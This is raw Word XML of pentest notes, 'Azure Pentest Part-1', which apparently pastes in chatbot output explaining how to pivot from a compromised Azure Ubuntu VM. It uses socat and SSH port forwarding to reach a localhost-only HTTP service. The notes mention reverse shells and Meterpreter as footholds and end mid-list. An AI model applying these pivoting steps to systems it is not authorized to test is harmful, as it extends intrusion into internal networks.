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5386B" w14:textId="6FB1B4B6" w:rsidR="0040643E" w:rsidRDefault="000B0495" w:rsidP="000B0495">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Azure Pentest</w:t>
      </w:r>
      <w:r w:rsidR="006560F2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Part-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188C2113" w14:textId="77777777" w:rsidR="000B0495" w:rsidRDefault="000B0495">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C88EE32" w14:textId="77777777" w:rsidR="006560F2" w:rsidRDefault="006560F2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24613494" w14:textId="773AF0C5" w:rsidR="006560F2" w:rsidRDefault="006560F2" w:rsidP="006560F2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Port forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BA1958" w14:textId="77777777" w:rsidR="006560F2" w:rsidRDefault="006560F2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62397707" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00843CEA" w:rsidP="00843CEA">
      <w:r w:rsidRPr="00843CEA">
        <w:t xml:space="preserve">Here is a polished and corrected version of your text, rewritten in the context of an </w:t>
      </w:r>
      <w:r w:rsidRPr="00843CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure Penetration Test</w:t>
      </w:r>
      <w:r w:rsidRPr="00843CEA">
        <w:t xml:space="preserve">, specifically focusing on </w:t>
      </w:r>
      <w:r w:rsidRPr="00843CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>port forwarding with Socat</w:t>
      </w:r>
      <w:r w:rsidRPr="00843CEA">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51983A8F" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00000000" w:rsidP="00843CEA">
      <w:r>
        <w:pict w14:anchorId="4374F235">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="580B52D2" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00843CEA" w:rsidP="00843CEA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Port Forwarding in Azure Penetration Testing Using Socat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45751815" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00843CEA" w:rsidP="00843CEA">
      <w:r w:rsidRPr="00843CEA">
        <w:t xml:space="preserve">During an Azure penetration test, it’s common to encounter services that are only accessible from within a compromised virtual machine (VM) and not directly exposed to the external network. In such cases, </w:t>
      </w:r>
      <w:r w:rsidRPr="00843CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>port forwarding</w:t>
      </w:r>
      <w:r w:rsidRPr="00843CEA">
        <w:t xml:space="preserve"> becomes essential to access these internal services from your attacker machine. Tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00843CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Socat</w:t>
      </w:r>
      <w:r w:rsidRPr="00843CEA">
        <w:t xml:space="preserve"> can be used for this purpose, functioning similarly to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00843CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit port forwarding</w:t>
      </w:r>
      <w:r w:rsidRPr="00843CEA">
        <w:t xml:space="preserve"> feature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3829B6A5" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00843CEA" w:rsidP="00843CEA">
      <w:r w:rsidRPr="00843CEA">
        <w:t>Let’s consider a scenario where we’ve gained access to an Ubuntu VM within an Azure environment. Running the netstat -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00843CEA">
        <w:t>antp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00843CEA">
        <w:t xml:space="preserve"> command on this compromised host reveals an internal HTTP service listening on port 8080. This service is bound to the localhost interface (127.0.0.1) and is not directly accessible from our Kali attack machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3350A9B0" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00843CEA" w:rsidP="00843CEA">
      <w:r w:rsidRPr="00843CEA">
        <w:t xml:space="preserve">To access this internal service from our Kali machine, we use </w:t>
      </w:r>
      <w:r w:rsidRPr="00843CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Socat</w:t>
      </w:r>
      <w:r w:rsidRPr="00843CEA">
        <w:t xml:space="preserve"> to forward the local port 8080 from the Ubuntu VM to a local port (1234) on our Kali machine. This is achieved with the following command executed on the Ubuntu VM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388AA54C" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00843CEA" w:rsidP="00843CEA">
      <w:r w:rsidRPr="00843CEA">
        <w:t>socat TCP-LISTEN:1234,fork,reuseaddr TCP:127.0.0.1:8080 &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F41EB7" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00843CEA" w:rsidP="00843CEA">
      <w:r w:rsidRPr="00843CEA">
        <w:t>This command listens on port 1234 of the Ubuntu machine and forwards any incoming traffic to 127.0.0.1:8080, effectively exposing the internal service to any system that can reach port 1234 on the Ubuntu VM. Assuming an SSH tunnel or other connectivity exists between the Kali machine and the Ubuntu VM, we can then connect to the service from the Kali machine as if it were local.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654B1E9B" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00843CEA" w:rsidP="00843CEA">
      <w:r w:rsidRPr="00843CEA">
        <w:t>Once the port is forwarded, we open a browser on the Kali machine and navigate to http://&lt;ubuntu-vm-ip&gt;:1234. The HTTP service becomes accessible, revealing the internal web page that was otherwise unreachable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE20F22" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00000000" w:rsidP="00843CEA">
      <w:r>
        <w:pict w14:anchorId="787CAE59">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="346B3144" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00843CEA" w:rsidP="00843CEA">
      <w:r w:rsidRPr="00843CEA">
        <w:t>Would you like a diagram to illustrate this port forwarding setup?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1F5B0E" w14:textId="77777777" w:rsidR="000B0495" w:rsidRDefault="000B0495">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="217FF366" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRDefault="00843CEA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38D0FE84" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00843CEA" w:rsidP="00843CEA">
      <w:r w:rsidRPr="00843CEA">
        <w:t xml:space="preserve">Here's a clear illustration of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00843CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>port forwarding setup in the context of an Azure Penetration Test</w:t>
      </w:r>
      <w:r w:rsidRPr="00843CEA">
        <w:t>, as requested:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C0EE50" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00843CEA" w:rsidP="00843CEA">
      <w:r w:rsidRPr="00843CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scenario Overview:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38833D2B" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00843CEA" w:rsidP="00843CEA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00843CEA">
        <w:t xml:space="preserve">You're attacking from a </w:t>
      </w:r>
      <w:r w:rsidRPr="00843CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kali Linux machine</w:t>
      </w:r>
      <w:r w:rsidRPr="00843CEA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCE66C0" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00843CEA" w:rsidP="00843CEA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00843CEA">
        <w:t xml:space="preserve">You've compromised an </w:t>
      </w:r>
      <w:r w:rsidRPr="00843CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ubuntu VM inside Azure</w:t>
      </w:r>
      <w:r w:rsidRPr="00843CEA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12489C35" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00843CEA" w:rsidP="00843CEA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00843CEA">
        <w:t xml:space="preserve">The Ubuntu VM is running a </w:t>
      </w:r>
      <w:r w:rsidRPr="00843CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>local-only HTTP service on port 8080</w:t>
      </w:r>
      <w:r w:rsidRPr="00843CEA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069D6989" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00843CEA" w:rsidP="00843CEA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00843CEA">
        <w:t xml:space="preserve">You use </w:t>
      </w:r>
      <w:r w:rsidRPr="00843CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Socat on the Ubuntu VM</w:t>
      </w:r>
      <w:r w:rsidRPr="00843CEA">
        <w:t xml:space="preserve"> to forward port 8080 to </w:t>
      </w:r>
      <w:r w:rsidRPr="00843CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>port 1234</w:t>
      </w:r>
      <w:r w:rsidRPr="00843CEA">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE65CCC" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00843CEA" w:rsidP="00843CEA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00843CEA">
        <w:t>From your Kali machine, you access the forwarded service via the Azure VM's public IP and port 1234.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2382E882" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00000000" w:rsidP="00843CEA">
      <w:r>
        <w:pict w14:anchorId="73AEAF59">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="701E9A5E" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00843CEA" w:rsidP="00843CEA">
      <w:r w:rsidRPr="00843CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Illustrated Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6114EB80" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00843CEA" w:rsidP="00843CEA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00843CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Initial Discovery (Ubuntu VM):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9B884E" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00843CEA" w:rsidP="00843CEA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00843CEA">
        <w:t>You run netstat -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00843CEA">
        <w:t>antp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00843CEA">
        <w:t xml:space="preserve"> and find:</w:t>
      </w:r>
      <w:r w:rsidRPr="00843CEA">
        <w:br/>
        <w:t>127.0.0.1:8080 → Internal HTTP service (not externally reachable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC90D60" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00843CEA" w:rsidP="00843CEA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00843CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Port Forwarding Command (Ubuntu VM):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B12EB3A" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00843CEA" w:rsidP="00843CEA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00843CEA">
        <w:t>socat TCP-LISTEN:1234,fork,reuseaddr TCP:127.0.0.1:8080 &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD6D143" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00843CEA" w:rsidP="00843CEA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00843CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Port 1234 (Ubuntu VM) now forwards to 127.0.0.1:8080.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F26ABDD" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00843CEA" w:rsidP="00843CEA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00843CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kali Machine accesses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499C23C9" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00843CEA" w:rsidP="00843CEA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00843CEA">
        <w:t>http://&lt;Ubuntu_VM_Public_IP&gt;:1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0615C272" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00843CEA" w:rsidP="00843CEA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00843CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD13C86" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00843CEA" w:rsidP="00843CEA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00843CEA">
        <w:t>Kali gets access to the internal HTTP service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750BA17D" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00000000" w:rsidP="00843CEA">
      <w:r>
        <w:pict w14:anchorId="0F89E98A">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3F3D2F" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRPr="00843CEA" w:rsidRDefault="00843CEA" w:rsidP="00843CEA">
      <w:r w:rsidRPr="00843CEA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Diagram Incoming:</w:t>
      </w:r>
      <w:r w:rsidRPr="00843CEA">
        <w:br/>
        <w:t>The visual version of this setup is being generated now — I’ll notify you as soon as it’s ready.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E007987" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRDefault="00843CEA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6576B289" w14:textId="77777777" w:rsidR="00843CEA" w:rsidRDefault="00843CEA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D1E9B86" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:r w:rsidRPr="00FD1838">
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD1838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>port forwarding during an Azure Penetration Test</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD1838">
        <w:t xml:space="preserve"> is a powerful technique to access </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD1838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>internal or restricted services</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD1838">
        <w:t xml:space="preserve"> that are </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD1838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>not exposed externally</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD1838">
        <w:t>. This is especially useful once you've compromised an internal VM or container in Azure. Here's how it's used and what vulnerabilities typically enable it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4170C6" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00000000" w:rsidP="00FD1838">
      <w:r>
        <w:pict w14:anchorId="62381707">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B90109A" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD1838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> How to Use Port Forwarding in an Azure Pentest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D9D862" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Gain Initial Foothold</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004F0BC9" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:t>Exploit a vulnerability (e.g., vulnerable web app, misconfigured service) to gain access to a VM, container, or App Service within Azure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7383CBDF" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:t>Establish a shell (reverse shell, Meterpreter, SSH, etc.) to the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22313083" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enumerate Internal Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541ED540" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Use tools like netstat, ss, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FD1838">
        <w:t>lsof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FD1838">
        <w:t>, or nmap to identify services listening on localhost (127.0.0.1) or private IPs (e.g., Azure VNet).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE7D2EA" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:t>Example: netstat -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FD1838">
        <w:t>antp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FD1838">
        <w:t xml:space="preserve"> | grep LISTEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01932C9C" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Set Up Port Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062308BC" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:t xml:space="preserve">Use socat, ssh -L, or Metasploit’s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FD1838">
        <w:t>portfwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FD1838">
        <w:t xml:space="preserve"> to forward the internal port to your attacker machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0912C049" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Socat example</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD1838">
        <w:t xml:space="preserve"> (on compromised machine):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F676108" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:t>socat TCP-LISTEN:1234,fork,reuseaddr TCP:127.0.0.1:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C02466E" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSH tunnel example</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD1838">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E54C3CC" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00FD1838">
        <w:t xml:space="preserve">ssh -L 1234:localhost:8080 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FD1838">
        <w:t>user@compromised-vm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="44E86125" w14:textId="77777777" w:rsidR="00FD1838" w:rsidRPr="00FD1838" w:rsidRDefault="00FD1838" w:rsidP="00FD1838">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
